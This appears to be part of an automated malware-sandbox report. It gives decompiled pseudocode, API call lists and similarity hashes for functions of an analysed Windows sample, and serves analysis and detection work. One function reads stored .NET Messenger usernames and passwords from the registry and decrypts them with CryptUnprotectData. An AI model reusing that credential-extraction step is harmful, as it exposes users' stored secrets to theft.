                                • Instruction Fuzzy Hash: F921D77150820479EB60A7619C83FEBB7EC4F15709F10409FF789E10C1EAACABC5466A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004068B5, Relevance: 16.6, APIs: 11, Instructions: 58clipboardmemoryfileCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E004068B5(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				long _v8;
				void* _v12;
				long _v16;
				void* _t14;
				void* _t20;
				void* _t28;
				void* _t33;
				long _t35;

				_v8 = _v8 & 0x00000000;
				EmptyClipboard();
				_t14 = E004067BA(_a4);
				_v12 = _t14;
				if(_t14 == 0xffffffff) {
					_v8 = GetLastError();
				} else {
					_t35 = GetFileSize(_t14, 0);
					_t5 = _t35 + 1; // 0x1
					_t20 = GlobalAlloc(0x2000, _t5);
					_t28 = _t20;
					if(_t28 == 0) {
						L4:
						_v8 = GetLastError();
					} else {
						GlobalFix(_t28);
						_t33 = _t20;
						if(ReadFile(_v12, _t33, _t35,  &_v16, 0) == 0) {
							goto L4;
						} else {
							 *((char*)(_t33 + _t35)) = 0;
							GlobalUnWire(_t28);
							SetClipboardData(1, _t28);
						}
					}
					CloseHandle(_v12);
				}
				CloseClipboard();
				return _v8;
			}











                                0x004068bb
                                0x004068bf
                                0x004068c8
                                0x004068d1
                                0x004068d4
                                0x0040694a
                                0x004068d6
                                0x004068e2
                                0x004068e4
                                0x004068ed
                                0x004068f3
                                0x004068f7
                                0x0040692d
                                0x00406933
                                0x004068f9
                                0x004068fa
                                0x00406902
                                0x00406915
                                0x00000000
                                0x00406917
                                0x00406918
                                0x0040691c
                                0x00406925
                                0x00406925
                                0x00406915
                                0x00406939
                                0x00406941
                                0x0040694d
                                0x00406957

                                APIs
                                • EmptyClipboard.USER32 ref: 004068BF
                                  • Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 004068DC
                                • GlobalAlloc.KERNEL32(00002000,00000001), ref: 004068ED
                                • GlobalFix.KERNEL32(00000000), ref: 004068FA
                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040690D
                                • GlobalUnWire.KERNEL32(00000000), ref: 0040691C
                                • SetClipboardData.USER32(00000001,00000000), ref: 00406925
                                • GetLastError.KERNEL32 ref: 0040692D
                                • CloseHandle.KERNEL32(?), ref: 00406939
                                • GetLastError.KERNEL32 ref: 00406944
                                • CloseClipboard.USER32 ref: 0040694D
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                • String ID:
                                • API String ID: 2565263379-0
                                • Opcode ID: 7cc790b86ad5fb4f13c7b98d55ec42b7b78c1a001a2156659b5bb496b015d989
                                • Instruction ID: 43236b9afd726b755d45991aac83c0a8e3bcf6aaaa4f317cb2ebd178168b56f4
                                • Opcode Fuzzy Hash: 7cc790b86ad5fb4f13c7b98d55ec42b7b78c1a001a2156659b5bb496b015d989
                                • Instruction Fuzzy Hash: 07113D75904605FBD7116FA4AD4CBDE7FB8EB88325F108075F902E2290DB748944CA69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004088D4, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowstringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 20%
                                			E004088D4(void* __ecx, int _a4, struct tagMENUITEMINFOA _a8, intOrPtr _a12, int _a24, intOrPtr _a28, char* _a44, int _a48, char _a56, void _a57, char _a4160, void _a4161) {
				char* _v0;
				int _v4;
				int _t38;
				char* _t48;
				void* _t50;
				void* _t57;
				int _t62;
				intOrPtr _t63;
				signed int _t68;
				signed int _t69;

				_t57 = __ecx;
				_t69 = _t68 & 0xfffffff8;
				0x414060();
				_t38 = GetMenuItemCount(_a8.cbSize);
				_a4 = _t38;
				_v4 = 0;
				if(_t38 <= 0) {
					L15:
					return _t38;
				} else {
					do {
						memset( &_a57, 0, 0x1000);
						_t69 = _t69 + 0xc;
						_a44 =  &_a56;
						_a8.cbSize = 0x30;
						_a12 = 0x36;
						_a48 = 0x1000;
						_a56 = 0;
						if(GetMenuItemInfoA(_a8.cbSize, _v4, 1,  &_a8) == 0) {
							goto L14;
						}
						if(_a56 == 0) {
							L12:
							if(_a28 != 0) {
								_push(0);
								_push(_a28);
								_push(_a4);
								E004088D4(_t57);
								_t69 = _t69 + 0xc;
							}
							goto L14;
						}
						_t62 = _a24;
						_a4160 = 0;
						memset( &_a4161, 0, 0x1000);
						_t48 = strchr( &_a56, 9);
						_t69 = _t69 + 0x14;
						_v0 = _t48;
						if(_a28 != 0) {
							if(_a12 == 0) {
								 *0x41e1fc =  *0x41e1fc + 1;
								_t63 =  *0x41e1fc; // 0x0
								_t62 = _t63 + 0x11558;
							} else {
								_t62 = _v4 + 0x11171;
							}
						}
						_t50 = E00408BF9(_t62,  &_a4160);
						_pop(_t57);
						if(_t50 != 0) {
							if(_v0 != 0) {
								0x413cf4( &_a4160, _v0);
								_pop(_t57);
							}
							ModifyMenuA(_a8, _v4, 0x400, _t62,  &_a4160);
						}
						goto L12;
						L14:
						_v4 = _v4 + 1;
						_t38 = _v4;
					} while (_t38 < _a4);
					goto L15;
				}
			}













                                0x004088d4
                                0x004088d7
                                0x004088df
                                0x004088ea
                                0x004088f4
                                0x004088f8
                                0x004088fc
                                0x00408a22
                                0x00408a28
                                0x00408902
                                0x00408907
                                0x0040890e
                                0x00408913
                                0x0040891a
                                0x00408929
                                0x00408934
                                0x0040893c
                                0x00408940
                                0x0040894c
                                0x00000000
                                0x00000000
                                0x00408956
                                0x004089fa
                                0x004089fe
                                0x00408a00
                                0x00408a01
                                0x00408a05
                                0x00408a08
                                0x00408a0d
                                0x00408a0d
                                0x00000000
                                0x004089fe
                                0x0040895c
                                0x0040896a
                                0x00408971
                                0x0040897d
                                0x00408982
                                0x00408989
                                0x0040898d
                                0x00408992
                                0x004089a0
                                0x004089a6
                                0x004089ac
                                0x00408994
                                0x00408998
                                0x00408998
                                0x00408992
                                0x004089bb
                                0x004089c3
                                0x004089c4
                                0x004089ca
                                0x004089d8
                                0x004089de
                                0x004089de
                                0x004089f4
                                0x004089f4
                                0x00000000
                                0x00408a10
                                0x00408a10
                                0x00408a14
                                0x00408a18
                                0x00000000
                                0x00408907

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
                                • String ID: 0$6
                                • API String ID: 3540791495-3849865405
                                • Opcode ID: 279e0e3116dd7a36083eff5afaa6bfe1abce752894615ec7df7e32fa7ef46b8e
                                • Instruction ID: a8fe6fb1212bd118e16e367106d6d34f7a286138b6ca25e595fdc587e8241262
                                • Opcode Fuzzy Hash: 279e0e3116dd7a36083eff5afaa6bfe1abce752894615ec7df7e32fa7ef46b8e
                                • Instruction Fuzzy Hash: 0C31BFB2408380AFC7209F55D941AABBBE8EB84314F04483FF588A2251D778D984CF5A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C1E0, Relevance: 15.1, APIs: 10, Instructions: 133windowCOMMON
                                Download Yara Rule
                                C-Code - Quality: 93%
                                			E0040C1E0(void* __ecx, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				void* _v8;
				intOrPtr _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __esi;
				signed int _t44;
				signed int _t45;
				intOrPtr _t47;
				signed int _t52;
				intOrPtr _t81;
				signed char _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				void* _t90;
				void* _t91;

				_t83 = __ecx;
				_t87 = _a4;
				_t91 = _t87 - 0x402;
				_t90 = __ecx;
				if(_t91 > 0) {
					_t44 = _t87 - 0x415;
					__eflags = _t44;
					if(_t44 == 0) {
						_t45 = E00402942();
						__eflags = _t45;
						if(_t45 != 0) {
							L24:
							if(_t87 ==  *((intOrPtr*)(_t90 + 0x394))) {
								_t79 = _a12;
								_t85 =  *(_a12 + 0xc);
								_t47 =  *((intOrPtr*)(_t90 + 0x390));
								if((_t85 & 0x00000008) == 0) {
									__eflags = _t85 & 0x00000040;
									if((_t85 & 0x00000040) != 0) {
										 *0x41e1f4 =  *0x41e1f4 & 0x00000000;
										__eflags =  *0x41e1f4;
										SetFocus( *(_t47 + 0x184));
									}
								} else {
									E0040AAE2(_t47, _t79);
								}
							}
							return E00402E97(_t90, _t87, _a8, _a12);
						}
						E0040B1EC(__ecx);
						L23:
						E0040AFE6(_t83, _t90, __eflags, 0);
						goto L24;
					}
					_t52 = _t44 - 1;
					__eflags = _t52;
					if(_t52 == 0) {
						E0040B2B5(__ecx);
						goto L23;
					}
					__eflags = _t52 == 6;
					if(_t52 == 6) {
						SetFocus( *(__ecx + 0x174));
					}
					goto L24;
				}
				if(_t91 == 0) {
					 *(__ecx + 0x178) =  *(__ecx + 0x178) & 0x00000000;
					E0040B15B(__ecx);
					goto L23;
				}
				if(_t87 == 0x1c) {
					__eflags = _a8;
					if(_a8 == 0) {
						 *((intOrPtr*)(_t90 + 0x174)) = GetFocus();
					} else {
						E00402F49(__ecx, 0x41c);
					}
					goto L24;
				}
				if(_t87 == 0x20) {
					__eflags = _a8 -  *((intOrPtr*)(__ecx + 0x114));
					if(_a8 !=  *((intOrPtr*)(__ecx + 0x114))) {
						goto L24;
					}
					SetCursor(LoadCursorA( *0x41dbd4, 0x67));
					return 1;
				}
				if(_t87 == 0x2b) {
					_t81 = _a12;
					__eflags =  *((intOrPtr*)(_t81 + 0x14)) -  *((intOrPtr*)(__ecx + 0x114));
					if( *((intOrPtr*)(_t81 + 0x14)) ==  *((intOrPtr*)(__ecx + 0x114))) {
						SetBkMode( *(_t81 + 0x18), 1);
						SetTextColor( *(_t81 + 0x18), 0xff0000);
						_v8 = SelectObject( *(_t81 + 0x18),  *(__ecx + 0x388));
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t89 = _a12;
						_v28 = 0x14;
						_v20 = 5;
						DrawTextExA( *(_t89 + 0x18), __ecx + 0x285, 0xffffffff, _t89 + 0x1c, 4,  &_v28);
						SelectObject( *(_t89 + 0x18), _v8);
						_t87 = _a4;
					}
				} else {
					if(_t87 == 0x7b) {
						_t86 = _a8;
						if(_a8 ==  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x390)) + 0x184))) {
							E0040C01D(__ecx, _t86);
						}
					}
				}
				goto L24;
			}



















                                0x0040c1e0
                                0x0040c1e9
                                0x0040c1f1
                                0x0040c1f3
                                0x0040c1f5
                                0x0040c325
                                0x0040c325
                                0x0040c32a
                                0x0040c34b
                                0x0040c350
                                0x0040c352
                                0x0040c362
                                0x0040c368
                                0x0040c36a
                                0x0040c36d
                                0x0040c373
                                0x0040c379
                                0x0040c382
                                0x0040c385
                                0x0040c38d
                                0x0040c38d
                                0x0040c394
                                0x0040c394
                                0x0040c37b
                                0x0040c37b
                                0x0040c37b
                                0x0040c379
                                0x00000000
                                0x0040c3a3
                                0x0040c356
                                0x0040c35b
                                0x0040c35d
                                0x00000000
                                0x0040c35d
                                0x0040c32c
                                0x0040c32c
                                0x0040c32d
                                0x0040c344
                                0x00000000
                                0x0040c344
                                0x0040c32f
                                0x0040c332
                                0x0040c33a
                                0x0040c33a
                                0x00000000
                                0x0040c332
                                0x0040c1fb
                                0x0040c315
                                0x0040c31c
                                0x00000000
                                0x0040c31c
                                0x0040c204
                                0x0040c2f3
                                0x0040c2f7
                                0x0040c30d
                                0x0040c2f9
                                0x0040c300
                                0x0040c300
                                0x00000000
                                0x0040c2f7
                                0x0040c20d
                                0x0040c2ca
                                0x0040c2d0
                                0x00000000
                                0x00000000
                                0x0040c2e5
                                0x00000000
                                0x0040c2ed
                                0x0040c216
                                0x0040c242
                                0x0040c248
                                0x0040c24e
                                0x0040c259
                                0x0040c267
                                0x0040c27e
                                0x0040c286
                                0x0040c287
                                0x0040c288
                                0x0040c289
                                0x0040c28a
                                0x0040c2a3
                                0x0040c2aa
                                0x0040c2b1
                                0x0040c2bd
                                0x0040c2bf
                                0x0040c2bf
                                0x0040c218
                                0x0040c21b
                                0x0040c227
                                0x0040c230
                                0x0040c238
                                0x0040c238
                                0x0040c230
                                0x0040c21b
                                0x00000000

                                APIs
                                • SetBkMode.GDI32(?,00000001), ref: 0040C259
                                • SetTextColor.GDI32(?,00FF0000), ref: 0040C267
                                • SelectObject.GDI32(?,?), ref: 0040C27C
                                • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040C2B1
                                • SelectObject.GDI32(00000014,?), ref: 0040C2BD
                                  • Part of subcall function 0040C01D: GetCursorPos.USER32(?), ref: 0040C02A
                                  • Part of subcall function 0040C01D: GetSubMenu.USER32(?,00000000), ref: 0040C038
                                  • Part of subcall function 0040C01D: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C066
                                • LoadCursorA.USER32(00000067), ref: 0040C2DE
                                • SetCursor.USER32(00000000), ref: 0040C2E5
                                • SetFocus.USER32(?), ref: 0040C33A
                                • SetFocus.USER32(?), ref: 0040C394
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadModePopupTrack
                                • String ID:
                                • API String ID: 4166086388-0
                                • Opcode ID: 0f428dd74f7ae692e61f7adedafcb516b73031be7699d21d2f2f5f012eb25ada
                                • Instruction ID: ca719c1047b4580995a570777fd11ce3246ad295cd7033b7258bae339062b572
                                • Opcode Fuzzy Hash: 0f428dd74f7ae692e61f7adedafcb516b73031be7699d21d2f2f5f012eb25ada
                                • Instruction Fuzzy Hash: B341A131110604EBCB119F64C8C9BEF7BA5FB44710F11C23AF916A62E1C739A9519B9E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004037A2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 193stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 37%
                                			E004037A2(char* __edi, long long __fp0) {
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				int _v40;
				long long _v44;
				long long _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				char _v68;
				int _t79;
				char _t80;
				signed int _t95;
				int _t99;
				int _t101;
				void* _t104;
				void* _t105;
				intOrPtr _t114;
				char _t116;
				char* _t117;
				void* _t118;
				long long _t119;
				long long* _t120;
				long long _t154;
				long long _t160;

				_t154 = __fp0;
				_t117 = __edi;
				_t79 = strlen(__edi);
				asm("fldz");
				_t104 = 0;
				_v52 = __fp0;
				_t118 = 0;
				_pop(_t105);
				_v40 = _t79;
				_v16 = 0;
				_v20 = 0;
				_v24 = 0;
				_v28 = 0;
				_v12 = 0;
				_v32 = 0;
				_v60 = 0x20;
				_v68 = 0;
				_v56 = 0;
				_v64 = 0;
				if(_t79 <= 0) {
					L43:
					_v8 = _t104;
					_t80 = 0x1a;
					if(_v16 != _t104) {
						_v8 = _t80;
					}
					if(_v20 != _t104) {
						_v8 = _v8 + _t80;
					}
					if(_v24 != _t104) {
						_v8 = _v8 + 0xa;
					}
					if(_v28 != _t104) {
						_v8 = _v8 + 0x10;
					}
					if(_v12 != _t104) {
						_v8 = _v8 + 0x11;
					}
					if(_v32 != _t104) {
						_v8 = _v8 + 0x1e;
					}
					if(_v8 <= _t104) {
						if(_v68 != _t104) {
							0x413de6(_v68);
						}
						return 0;
					} else {
						asm("fild dword [ebp-0x4]");
						 *_t120 = _t154;
						0x413d68(_t105, _t105);
						_v44 = _t154;
						 *_t120 =  *0x4196e8;
						0x413d68();
						asm("fdivr qword [ebp-0x28]");
						asm("fistp qword [ebp-0x30]");
						_t119 = _v52;
						if(_v68 != _t104) {
							0x413de6(_v68);
						}
						return _t119;
					}
				} else {
					goto L1;
				}
				do {
					L1:
					_t116 =  *((intOrPtr*)(_t118 + _t117));
					_v8 = _t116;
					if(_t116 - 0x41 <= 0x19) {
						_v16 = _v16 + 1;
					}
					if(_t116 - 0x61 <= 0x19) {
						_v20 = _v20 + 1;
					}
					if(_t116 - 0x30 <= 9) {
						_v24 = _v24 + 1;
					}
					if(_t116 - 0x20 <= 0xf) {
						_v28 = _v28 + 1;
					}
					if(_t116 - 0x3a <= 6) {
						_v12 = _v12 + 1;
					}
					if(_t116 - 0x5b <= 5) {
						_v12 = _v12 + 1;
					}
					if(_t116 < 0x7b) {
						L16:
						if(_t116 <= 0x7e) {
							goto L18;
						}
						goto L17;
					} else {
						if(_t116 > 0x7e) {
							L17:
							_v32 = _v32 + 1;
							L18:
							if(_t118 != _t104) {
								_t95 = 0;
								if(_v56 <= 0) {
									L27:
									_t95 = _t95 | 0xffffffff;
									L28:
									_t104 = 0;
									if(_t95 < 0) {
										E004040C3( &_v68, _v8);
										_t99 = abs( *((char*)(_t118 + _t117)) -  *((char*)(_t118 + _t117 - 1)));
										_pop(_t105);
										if(_t99 != 1) {
											_t47 = _t99 - 2; // -2
											_t105 = _t47;
											if(_t105 > 3) {
												if(_t99 < 6) {
													if(_t99 <= 0xa) {
														goto L42;
													}
													L40:
													_t154 = _v52 +  *0x4196f0;
													L41:
													_v52 = _t154;
													goto L42;
												}
												if(_t99 > 0xa) {
													goto L40;
												}
												_t154 = _v52 +  *0x4196f8;
												goto L41;
											}
											_t154 = _v52 +  *0x419700;
											goto L41;
										}
										_t160 = _v52;
										L30:
										_t154 = _t160 +  *0x419710;
										goto L41;
									}
									_t101 = abs(_t116 -  *((char*)(_t118 + _t117 - 1)));
									_t160 = _v52;
									_pop(_t105);
									if(_t101 != 0) {
										_t154 = _t160 +  *0x419708;
										goto L41;
									}
									goto L30;
								}
								L21:
								L21:
								if(_t95 < 0 || _t95 >= _v56) {
									_t114 = 0;
								} else {
									_t114 =  *((intOrPtr*)(_t95 + _v68));
								}
								if(_t114 == _t116) {
									goto L28;
								}
								_t95 = _t95 + 1;
								if(_t95 < _v56) {
									goto L21;
								}
								goto L27;
							}
							E004040C3( &_v68, _v8);
							goto L40;
						}
						_v12 = _v12 + 1;
						goto L16;
					}
					L42:
					_t118 = _t118 + 1;
				} while (_t118 < _v40);
				goto L43;
			}
































                                0x004037a2
                                0x004037a2
                                0x004037ab
                                0x004037b0
                                0x004037b2
                                0x004037b4
                                0x004037b7
                                0x004037bb
                                0x004037bc
                                0x004037bf
                                0x004037c2
                                0x004037c5
                                0x004037c8
                                0x004037cb
                                0x004037ce
                                0x004037d1
                                0x004037d8
                                0x004037db
                                0x004037de
                                0x004037e1
                                0x00403917
                                0x0040391c
                                0x0040391f
                                0x00403920
                                0x00403922
                                0x00403922
                                0x00403928
                                0x0040392a
                                0x0040392a
                                0x00403930
                                0x00403932
                                0x00403932
                                0x00403939
                                0x0040393b
                                0x0040393b
                                0x00403942
                                0x00403944
                                0x00403944
                                0x0040394b
                                0x0040394d
                                0x0040394d
                                0x00403954
                                0x00403997
                                0x0040399c
                                0x004039a1
                                0x00000000
                                0x00403956
                                0x00403956
                                0x0040395b
                                0x0040395e
                                0x00403963
                                0x0040396c
                                0x0040396f
                                0x00403977
                                0x0040397f
                                0x00403982
                                0x00403985
                                0x0040398a
                                0x0040398f
                                0x00000000
                                0x00403990
                                0x00000000
                                0x00000000
                                0x00000000
                                0x004037e7
                                0x004037e7
                                0x004037e7
                                0x004037f0
                                0x004037f3
                                0x004037f5
                                0x004037f5
                                0x004037fe
                                0x00403800
                                0x00403800
                                0x00403809
                                0x0040380b
                                0x0040380b
                                0x00403814
                                0x00403816
                                0x00403816
                                0x0040381f
                                0x00403821
                                0x00403821
                                0x0040382a
                                0x0040382c
                                0x0040382c
                                0x00403832
                                0x0040383c
                                0x0040383f
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00403834
                                0x00403837
                                0x00403841
                                0x00403841
                                0x00403844
                                0x00403846
                                0x00403858
                                0x0040385d
                                0x0040387c
                                0x0040387c
                                0x0040387f
                                0x0040387f
                                0x00403883
                                0x004038b3
                                0x004038c4
                                0x004038cc
                                0x004038cd
                                0x004038d4
                                0x004038d4
                                0x004038da
                                0x004038ea
                                0x004038ff
                                0x00000000
                                0x00000000
                                0x00403901
                                0x00403904
                                0x0040390a
                                0x0040390a
                                0x00000000
                                0x0040390a
                                0x004038ef
                                0x00000000
                                0x00000000
                                0x004038f4
                                0x00000000
                                0x004038f4
                                0x004038df
                                0x00000000
                                0x004038df
                                0x004038cf
                                0x0040389d
                                0x0040389d
                                0x00000000
                                0x0040389d
                                0x00403890
                                0x00403897
                                0x0040389a
                                0x0040389b
                                0x004038a5
                                0x00000000
                                0x004038a5
                                0x00000000
                                0x0040389b
                                0x00000000
                                0x0040385f
                                0x00403861
                                0x00403870
                                0x00403868
                                0x0040386b
                                0x0040386b
                                0x00403874
                                0x00000000
                                0x00000000
                                0x00403876
                                0x0040387a
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0040387a
                                0x0040384e
                                0x00000000
                                0x0040384e
                                0x00403839
                                0x00000000
                                0x00403839
                                0x0040390d
                                0x0040390d
                                0x0040390e
                                0x00000000

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??3@$strlen
                                • String ID:
                                • API String ID: 4288758904-3916222277
                                • Opcode ID: 9742cbc5a7c83877be7f1addebf5a9349f3f5e6e9056573cb17e04df5597c3af
                                • Instruction ID: d333ae2b58ca57a5e95d27ff611bbcc91c556c8a5badbdc87924e9ab9e00570b
                                • Opcode Fuzzy Hash: 9742cbc5a7c83877be7f1addebf5a9349f3f5e6e9056573cb17e04df5597c3af
                                • Instruction Fuzzy Hash: 15616AB1C0461ADADF20AFA5D4854EEBFB8FB05306F2084BFE151B2281C7794B428B49
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040FE5D, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 99registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegQueryValueExA.ADVAPI32(?,Password.NET Messenger Service,00000000,00000000,?,?,75D6F420,00000000), ref: 0040FE8C
                                • RegQueryValueExA.ADVAPI32(?,User.NET Messenger Service,00000000,00000000,?,?), ref: 0040FF56
                                  • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                  • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                • memcpy.MSVCRT ref: 0040FEFE
                                • LocalFree.KERNEL32(?,?,00000000,?), ref: 0040FF0A
                                • RegCloseKey.ADVAPI32(?), ref: 0040FF79
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: QueryValue$AddressCloseFreeLibraryLoadLocalProcmemcpy
                                • String ID: $Password.NET Messenger Service$User.NET Messenger Service
                                • API String ID: 2372935584-105384665
                                • Opcode ID: 0efffbcd1b8067ca95f35c9c097a34e3d5fc4d975f38032de2900e02614f1ca4
                                • Instruction ID: 9eae1372b2d93665619faee8fa876547b7665fb4356df5418aeb828a8df32af1
                                • Opcode Fuzzy Hash: 0efffbcd1b8067ca95f35c9c097a34e3d5fc4d975f38032de2900e02614f1ca4
                                • Instruction Fuzzy Hash: AD314FB2D00219AFDB11DF95D880ADEBBB8FF49344F004077F515B3251D7389A499B98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00404D7A, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                Download Yara Rule
                                C-Code - Quality: 58%
                                			E00404D7A(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t7;
				_Unknown_base(*)()* _t12;
				struct HWND__* _t16;
				void* _t21;
				struct HINSTANCE__* _t24;

				_v12 = 8;
				_v8 = 0xff;
				_t16 = 0;
				_t21 = 0;
				_t24 = LoadLibraryA("comctl32.dll");
				if(_t24 == 0) {
					L5:
					 *0x415038();
					_t7 = 1;
					L6:
					if(_t7 != 0) {
						return 1;
					} else {
						MessageBoxA(_t7, "Error: Cannot load the common control classes.", "Error", 0x30);
						return 0;
					}
				}
				_t12 = GetProcAddress(_t24, "InitCommonControlsEx");
				if(_t12 != 0) {
					_t21 = 1;
					_t16 =  *_t12( &_v12);
				}
				FreeLibrary(_t24);
				if(_t21 == 0) {
					goto L5;
				} else {
					_t7 = _t16;
					goto L6;
				}
			}










                                0x00404d87
                                0x00404d8e
                                0x00404d95
                                0x00404d97
                                0x00404d9f
                                0x00404da3
                                0x00404dcd
                                0x00404dcd
                                0x00404dd5
                                0x00404dd6
                                0x00404ddb
                                0x00404df8
                                0x00404ddd
                                0x00404dea
                                0x00404df3
                                0x00404df3
                                0x00404ddb
                                0x00404dab
                                0x00404db3
                                0x00404db9
                                0x00404dbc
                                0x00404dbc
                                0x00404dbf
                                0x00404dc7
                                0x00000000
                                0x00404dc9
                                0x00404dc9
                                0x00000000
                                0x00404dc9

                                APIs
                                • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404D99
                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404DAB
                                • FreeLibrary.KERNEL32(00000000), ref: 00404DBF
                                • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404DEA
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Library$AddressFreeLoadMessageProc
                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                • API String ID: 2780580303-317687271
                                • Opcode ID: 0271221c947319f8f9baa3460b985664642af3c5e03074db1750b5e73f8f99f3
                                • Instruction ID: eec6f3f66ef6417fb43289990c32370c6d67362bb519490399a3c202bd773795
                                • Opcode Fuzzy Hash: 0271221c947319f8f9baa3460b985664642af3c5e03074db1750b5e73f8f99f3
                                • Instruction Fuzzy Hash: 6701D671751615ABD3215BA09C49BEB3EA8DFC9749B118139E206F2180DFB8CA09829C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00406735, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarystringwindowCOMMON
                                Download Yara Rule
                                C-Code - Quality: 27%
                                			E00406735(long __edi, intOrPtr _a4) {
				char _v8;
				void* _t8;
				void* _t9;
				long _t12;
				long _t22;

				_t22 = __edi;
				_t8 = 0;
				_t12 = 0x1100;
				if(__edi - 0x834 <= 0x383) {
					_t8 = LoadLibraryExA("netmsg.dll", 0, 2);
					if(0 != 0) {
						_t12 = 0x1900;
					}
				}
				_t9 = FormatMessageA(_t12, _t8, _t22, 0x400,  &_v8, 0, 0);
				if(_t9 <= 0) {
					0x413d0c(_a4, "Unknown Error");
				} else {
					if(strlen(_v8) < 0x400) {
						0x413d0c(_a4, _v8);
					}
					_t9 = LocalFree(_v8);
				}
				return _t9;
			}








                                0x00406735
                                0x00406743
                                0x0040674b
                                0x00406750
                                0x0040675a
                                0x00406762
                                0x00406764
                                0x00406764
                                0x00406762
                                0x00406778
                                0x00406780
                                0x004067af
                                0x00406782
                                0x0040678d
                                0x00406795
                                0x0040679b
                                0x0040679f
                                0x0040679f
                                0x004067b9

                                APIs
                                • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 0040675A
                                • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406778
                                • strlen.MSVCRT ref: 00406785
                                • _mbscpy.MSVCRT ref: 00406795
                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 0040679F
                                • _mbscpy.MSVCRT ref: 004067AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                • String ID: Unknown Error$netmsg.dll
                                • API String ID: 2881943006-572158859
                                • Opcode ID: 6c5198025c4bc101f62493cbe4ad8011c35f98b5ff5852a1443cd9ba15c7a2da
                                • Instruction ID: dfc2e55caf94d9be92a05a02ea8e3c4f3bcfe7ce6760d4d77d664b9d120d38b6
                                • Opcode Fuzzy Hash: 6c5198025c4bc101f62493cbe4ad8011c35f98b5ff5852a1443cd9ba15c7a2da
                                • Instruction Fuzzy Hash: F1014731600210BBDB152B60FD46EDF7F2CDF44B95F20403AF602B6090DA385E50C69C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00404109, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 35libraryloaderCOMMON
                                Download Yara Rule
